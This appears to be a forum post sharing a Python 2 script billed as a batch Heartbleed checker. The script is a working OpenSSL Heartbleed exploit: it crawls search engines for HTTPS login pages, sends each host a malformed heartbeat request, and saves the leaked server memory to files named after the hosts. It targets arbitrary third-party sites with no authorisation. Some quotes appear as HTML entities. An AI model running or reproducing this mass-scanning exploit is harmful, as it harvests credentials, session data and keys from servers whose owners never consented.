OpenSSL HeartBleed漏洞批量检测工具

Jumbo

1. #-*- coding: gbk -*-
   
2. #by  溯溪
   
3. import sys
   
4. import struct
   
5. import socket
   
6. import time
   
7. import select
   
8. import re
   
9. import urllib2
   
10. from urlparse import urlparse
    
11. 
    
12. 
    
13. def h2bin(x):
    
14.     return x.replace(' ', '').replace('\n', '').decode('hex')
    
15. 
    
16. hello = h2bin('''
    
17. 16 03 02 00  dc 01 00 00 d8 03 02 53
    
18. 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    
19. bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    
20. 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    
21. 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    
22. c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    
23. c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    
24. c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    
25. c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    
26. 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    
27. 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    
28. 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    
29. 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    
30. 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    
31. 00 0f 00 01 01                                 
    
32. ''')
    
33. 
    
34. hb = h2bin('''
    
35. 18 03 02 00 03
    
36. 01 40 00
    
37. ''')
    
38. 
    
39. def hexdump(s):
    
40.     for b in xrange(0, len(s), 16):
    
41.         lin = [c for c in s[b : b + 16]]
    
42.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
    
43.         pdat = &#039;&#039;.join((c if 32 <= ord(c) <= 126 else &#039;.&#039; )for c in lin)
    
44.         print &#039;  %04x: %-48s %s&#039; % (b, hxdat, pdat)
    
45.     print
    
46. 
    
47. def recvall(s, length, timeout=5):
    
48.     endtime = time.time() + timeout
    
49.     rdata = &#039;&#039;
    
50.     remain = length
    
51.     while remain > 0:
    
52.         rtime = endtime - time.time()
    
53.         if rtime < 0:
    
54.             return None
    
55.         r, w, e = select.select([s], [], [], 5)
    
56.         if s in r:
    
57.             data = s.recv(remain)
    
58.             # EOF?
    
59.             if not data:
    
60.                 return None
    
61.             rdata += data
    
62.             remain -= len(data)
    
63.     return rdata
    
64.         
    
65. 
    
66. def recvmsg(s):
    
67.     hdr = recvall(s, 5)
    
68.     if hdr is None:
    
69.         print &#039;Unexpected EOF receiving record header - server closed connection&#039;
    
70.         return None, None, None
    
71.     typ, ver, ln = struct.unpack(&#039;>BHH&#039;, hdr)
    
72.     pay = recvall(s, ln, 10)
    
73.     if pay is None:
    
74.         print &#039;Unexpected EOF receiving record payload - server closed connection&#039;
    
75.         return None, None, None
    
76.     print &#039; ... received message: type = %d, ver = %04x, length = %d&#039; % (typ, ver, len(pay))
    
77.     return typ, ver, pay
    
78. 
    
79. def hit_hb(s,eURL):
    
80.     s.send(hb)
    
81.     while True:
    
82.         typ, ver, pay = recvmsg(s)
    
83.         if typ is None:
    
84.             print &#039;No heartbeat response received, server likely not vulnerable&#039;
    
85.             return False
    
86. 
    
87.         if typ == 24:
    
88.             print &#039;Received heartbeat response:&#039;
    
89.             hexdump(pay)
    
90.             if len(pay) > 3:
    
91.                 print &#039;WARNING: server returned more data than it should - server is vulnerable!&#039;
    
92.                 f=open(eURL,&#039;w&#039;)
    
93.                 f.write(pay)
    
94.                 f.close()
    
95.             else:
    
96.                 print &#039;Server processed malformed heartbeat, but did not return any extra data.&#039;
    
97.             return True
    
98. 
    
99.         if typ == 21:
    
100.             print &#039;Received alert:&#039;
     
101.             hexdump(pay)
     
102.             print &#039;Server returned error, likely not vulnerable&#039;
     
103.             return False
     
104. 
     
105. def ssltest(eURL):
     
106. 
     
107.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     
108.     print &#039;Connecting...to %s &#039;%eURL
     
109.     sys.stdout.flush()
     
110.     s.connect((eURL,443))
     
111.     print &#039;Sending Client Hello...&#039;
     
112.     sys.stdout.flush()
     
113.     s.send(hello)
     
114.     print &#039;Waiting for Server Hello...&#039;
     
115.     sys.stdout.flush()
     
116.     while True:
     
117.         typ, ver, pay = recvmsg(s)
     
118.         if typ == None:
     
119.             print &#039;Server closed connection without sending Server Hello.&#039;
     
120.             return
     
121.         # Look for server hello done message.
     
122.         if typ == 22 and ord(pay[0]) == 0x0E:
     
123.             break
     
124. 
     
125.     print &#039;Sending heartbeat request...&#039;
     
126.     sys.stdout.flush()
     
127.     s.send(hb)
     
128.     hit_hb(s,eURL)
     
129. 
     
130. #proxy_support = urllib2.ProxyHandler({&#039;http&#039;:&#039;http://127.0.0.1:8087&#039;})  #代理服务器
     
131. #opener = urllib2.build_opener(proxy_support, urllib2.HTTPHandler)
     
132. #urllib2.install_opener(opener)
     
133. headers = {&#039;User-Agent&#039;: &#039;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19&#039;}
     
134. 
     
135. def main():
     
136.     print &#039;开始爬行，请稍等&#039;
     
137.     for x in range(0,500,10):
     
138.         f=open("link.txt",&#039;a&#039;)
     
139.         URL="https://www.google.com/search?q=inurl:https://+登录&start=%d" %x  #Google 搜索
     
140.         #URL="http://www.baidu.com/#wd=inurl:https://+登录&pn=%d"%x  #Baidu 搜索
     
141.         #URL="https://www.bing.com/search?q=inurl:https://+登录&first=%d"%x  #Bing 搜索
     
142.         #URL="http://www.sogou.com/web?query=inurl:https://&page=%d" %x  #Sogou 搜索
     
143.         req = urllib2.Request(url = URL,headers = headers)
     
144.         content = urllib2.urlopen(req).read()
     
145.         a=re.findall(r&#039;(https://.*?/)&#039;,content)
     
146.         b=list(set(a))
     
147.         for i in b:
     
148.             o = urlparse(i)
     
149.             f.writelines(o.netloc+&#039;\n&#039;)
     
150.         print "已爬完第%s页"%(x/10+1)
     
151.         delay=5
     
152.         f.close()
     
153.    
     
154.     f=open("link.txt",&#039;r&#039;)
     
155.     for line in f:
     
156.         line = line.strip()
     
157.         ssltest(line)
     
158. 
     
159. if __name__ == &#039;__main__&#039;:
     
160.     main()

复制代码